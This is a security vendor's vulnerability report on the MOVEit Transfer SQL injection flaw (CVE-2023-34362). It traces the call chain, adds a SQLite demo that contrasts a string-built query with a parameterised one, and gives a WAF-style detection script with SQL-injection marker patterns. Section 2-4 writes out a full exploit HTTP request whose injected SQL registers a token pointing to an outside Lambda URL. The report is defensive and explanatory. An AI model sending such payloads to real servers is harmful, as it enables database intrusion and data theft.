Vulnerability report by the TA team: analysis of "MOVEit Transfer SQL Injection (CVE-2023-34362)"
This vulnerability was exploited by the CL0P ransomware group and caused significant damage: attackers used it to exfiltrate data from victims and then demanded payment for the stolen files.
It allows an unauthenticated attacker to read and manipulate a company's MOVEit Transfer database through SQL injection, resulting in data breaches, loss of sensitive information and serious service disruption. Because the entry point needs no credentials and the injected SQL is attacker-controlled, further attacks beyond the data theft described here are possible.
The vulnerability is fixed by updating to 13.0.7, 14.0.5, 14.1.6, 15.0.2 or the latest version, and exploit attempts are detected by the MOVEit pattern in our AIWAF product.
1. Overview
CVE-2023-34362 is a SQL injection vulnerability in the MOVEit Transfer web application, disclosed in the Progress advisory of 31 May 2023. It was exploited by the CL0P ransomware group and has become a major issue.
2. Attack Process
2-1. Invocation
The vulnerable functionality is reached through an unauthenticated request to guestaccess.aspx, which ends in the UserGetUsersWithEmailAddress() function; the related call chain is summarised in the subsections below.
2-2. Session
We will not go into a deep analysis of the call chain and all the variable settings needed to reach the vulnerable functionality. The key point is how the attacker gains control over session variables, and that lies at the start of SILGuestAccess, the code-behind class for guestaccess.aspx.
The main call there is this.m_pkginfo.LoadFromSession(), which populates the package information object from session variables that the attacker can influence.
Description: LoadFromSession() loads variables from the session.
Source: https://www.horizon3.ai/attack-research/attack-blogs/moveit-transfer-cve-2023-34362
2-3. Query
To trigger the SQL injection, the payload is first placed in the MyPkgSelfProvisionedRecips session variable through the path moveitisapi.dll?action=m2 > SILMachine2 (machine2.aspx) > SetAllSessionVarsFromHeaders(), which copies the X-siLock-SessVar request headers into the session; a subsequent request to guestaccess.aspx then copies it into SelfProvisionedRecips.
The SelfProvisionedRecips value is split into a comma-separated list of email addresses and passed to UserGetUsersWithEmailAddress(), which inserts each address into a SQL query of the form AND Email='...' without escaping the quote character, so the attacker's input is executed as arbitrary SQL:
SELECT Username, Permissions, LoginName, Email FROM users WHERE InstID=9389 AND Deleted=0 AND (Email='<EmailAddress>' OR Email LIKE (%EscapeLikeForSQL(<EmailAddress>)) OR Email LIKE (EscapeLikeForSQL(<EmailAddress>)));
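The query above is built by string concatenation, and the only escaping applied (EscapeLikeForSQL) targets LIKE wildcards, not quotes. The following added example (written for this report; it is not MOVEit's code) reproduces that query shape against an in-memory SQLite table with constructed sample rows, and places the parameterised version beside it. escape_like_for_sql() is a hypothetical stand-in for MOVEit's EscapeLikeForSQL(), and the INJECTION payload follows the shape of the page's exploit: close the quote and the parenthesis, then comment out the rest of the WHERE clause.

```python
import sqlite3

# Constructed sample rows (not MOVEit's real schema; only the columns the page's query names).
SAMPLE_USERS = [
    # InstID, Deleted, Username, Permissions, LoginName, Email
    (9389, 0, "alice", "User",  "alice", "alice@example.com"),
    (9389, 0, "bob",   "Admin", "bob",   "bob@example.com"),
    (9389, 1, "carol", "User",  "carol", "carol@example.com"),  # soft-deleted
    (1234, 0, "dave",  "User",  "dave",  "dave@example.com"),   # another organization
]

# Payload in the shape of the page's exploit: end the string literal, close the
# parenthesis, and turn everything after it into a SQL comment.
INJECTION = "x' OR 'a'='a') -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (InstID INTEGER, Deleted INTEGER, Username TEXT, "
        "Permissions TEXT, LoginName TEXT, Email TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    return conn


def escape_like_for_sql(value):
    # Hypothetical stand-in for MOVEit's EscapeLikeForSQL(): it neutralises the LIKE
    # wildcards % and _ with a backslash escape but does nothing about quote characters.
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def users_by_email_vulnerable(conn, inst_id, email):
    """String-built query in the shape the page shows: the caller-supplied address is
    pasted between quotes, so a quote inside it ends the literal and the rest is SQL."""
    like = escape_like_for_sql(email)
    sql = (
        "SELECT Username, Permissions, LoginName, Email FROM users "
        f"WHERE InstID={int(inst_id)} AND Deleted=0 AND ("
        f"Email='{email}' "
        f"OR Email LIKE '%{like}' ESCAPE '\\' "
        f"OR Email LIKE '{like}%' ESCAPE '\\')"
    )
    return conn.execute(sql).fetchall()


def users_by_email_fixed(conn, inst_id, email):
    """Same query with bound parameters: the address is always data, never SQL text."""
    like = escape_like_for_sql(email)
    sql = (
        "SELECT Username, Permissions, LoginName, Email FROM users "
        "WHERE InstID=? AND Deleted=0 AND ("
        "Email=? OR Email LIKE ? ESCAPE '\\' OR Email LIKE ? ESCAPE '\\')"
    )
    return conn.execute(sql, (inst_id, email, "%" + like, like + "%")).fetchall()


def demo():
    """Run both variants with a legitimate address and with the injection payload."""
    conn = make_db()
    return {
        "legit_vulnerable": users_by_email_vulnerable(conn, 9389, "alice@example.com"),
        "legit_fixed": users_by_email_fixed(conn, 9389, "alice@example.com"),
        "injected_vulnerable": users_by_email_vulnerable(conn, 9389, INJECTION),
        "injected_fixed": users_by_email_fixed(conn, 9389, INJECTION),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {[row[0] for row in rows]}")
```

With a real address both variants return only alice. With the payload, the string-built query degrades to WHERE InstID=9389 AND Deleted=0 AND (Email='x' OR 'a'='a') and returns every live user of the organisation, while the parameterised query returns nothing because the payload is compared as a literal email address. The real exploit goes further by stacking an INSERT after the closed parenthesis, which this SQLite driver refuses in execute(); the break-out mechanism is the same.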
2-4. Attack Syntax
Once the prerequisites above are met, the attack request is constructed and sent to the vulnerable server.
ex)
POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
xx-silock-transaction: folder_add_by_path
X-siLock-Transaction: session_setvars
X-siLock-SessVar0: MyPkgID: 0
X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO `userexternaltokens` (`TokenId`) VALUES ('exchange__https://kd5cvqi7mbey62lcxiypj2lxxu0kofsk.lambda-url.us-east-2.on.aws/'); -- asdf
Content-Length: 0
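The request above carries the payload in an X-siLock-SessVar header under a session_setvars transaction, which is what a WAF rule for this vulnerability has to inspect. The following added example (not the page's or the AIWAF product's code) parses two constructed requests, one shaped like the exploit above and one benign, and flags SQL metacharacters in the MyPkgSelfProvisionedRecips session variable; the lookalike-header check (a second header whose name ends in silock-transaction with a different value) is a heuristic added here for investigation, not a rule taken from the page. The regular expressions, function names and thresholds are assumptions.

```python
import re

# Constructed request in the shape of the page's exploit example (not a real capture).
EXPLOIT_REQUEST = (
    "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: python-requests/2.28.2\r\n"
    "Connection: close\r\n"
    "xx-silock-transaction: folder_add_by_path\r\n"
    "X-siLock-Transaction: session_setvars\r\n"
    "X-siLock-SessVar0: MyPkgID: 0\r\n"
    "X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO "
    "`userexternaltokens` (`TokenId`) VALUES ('x'); -- asdf\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Constructed benign request: same transaction, ordinary recipient list.
BENIGN_REQUEST = (
    "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "X-siLock-Transaction: session_setvars\r\n"
    "X-siLock-SessVar0: MyPkgID: 0\r\n"
    "X-siLock-SessVar1: MyPkgSelfProvisionedRecips: alice@example.com,bob@example.com\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Quote/comment characters and statement keywords that have no place in an email list.
SQLI_MARKERS = re.compile(
    r"['\"`;]|--|/\*|\b(insert|update|delete|select|union|drop)\b", re.IGNORECASE
)
SESSVAR_HEADER = re.compile(r"^x-silock-sessvar\d+$", re.IGNORECASE)
TARGET_VAR = "mypkgselfprovisionedrecips"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, [(name, value), ...])."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, headers


def inspect(raw):
    """Return the facts a rule would act on: whether the request sets session
    variables through moveitisapi.dll?action=m2, lookalike transaction headers,
    and session variables whose value looks like SQL rather than email addresses."""
    _method, target, headers = parse_request(raw)
    lower = [(name.lower(), value) for name, value in headers]
    target_l = target.lower()
    transactions = [v for n, v in lower if n == "x-silock-transaction"]
    sets_session_vars = (
        "moveitisapi.dll" in target_l
        and "action=m2" in target_l
        and any(v.lower() == "session_setvars" for v in transactions)
    )
    lookalikes = [
        n for n, _ in lower
        if n != "x-silock-transaction" and n.endswith("silock-transaction")
    ]
    suspicious = []
    for name, value in lower:
        if not SESSVAR_HEADER.match(name):
            continue
        var, _, val = value.partition(":")  # header value is "VarName: VarValue"
        if var.strip().lower() == TARGET_VAR and SQLI_MARKERS.search(val):
            suspicious.append((var.strip(), val.strip()))
    return {
        "sets_session_vars": sets_session_vars,
        "lookalike_transaction_headers": lookalikes,
        "suspicious_vars": suspicious,
    }


def should_block(raw):
    """Block only on SQL syntax in the injected recipient list; the session_setvars
    transaction itself is legitimate traffic."""
    return bool(inspect(raw)["suspicious_vars"])


if __name__ == "__main__":
    for label, req in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, should_block(req), inspect(req))
```

The benign request still sets session variables through the same transaction, so the decision rests on the content of MyPkgSelfProvisionedRecips rather than on the path. A quoted local part (for example "o'brien"@example.com) is legal in an email address and would trip the quote check, so in production the marker list should be tuned against the recipient formats the deployment actually sees.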
3. Countermeasures
There are two general ways to respond to MOVEit Transfer SQL Injection (CVE-2023-34362):
* Disable all HTTP and HTTPS traffic to the MOVEit Transfer environment until it has been patched.
* Patch MOVEit Transfer to the latest version.
Our AIWAF product detects requests that exploit this vulnerability with the pattern "MOVEit Privilege Escalation Vulnerability".
4. Conclusion
The MOVEit incident, led by the CL0P ransomware group, dominated cybersecurity news for some time, with more than 1,000 organizations affected. That number is expected to keep growing, making it one of the most damaging software supply chain attacks since SolarWinds in 2020.
Vulnerabilities in MOVEit products have a high impact because the product is exposed to the internet by design and the flaws can be exploited in several ways. They require a rapid response to limit the damage, so regular checks and updates are essential.
Our AIWAF product already includes a number of patterns for MOVEit product vulnerabilities, and we will continue to respond quickly to new MOVEit vulnerabilities as they are discovered.
5. References
- https://www.hackthebox.com/blog/cve-2023-34362-explained#vulnerability_description
- https://ko.securecodewarrior.com/article/deep-dive-up-close-and-personal-with-the-moveit-zero-day-vulnerability
- https://www.akamai.com/ko/blog/security-research/moveit-sqli-zero-day-exploit-clop-ransomware
- https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023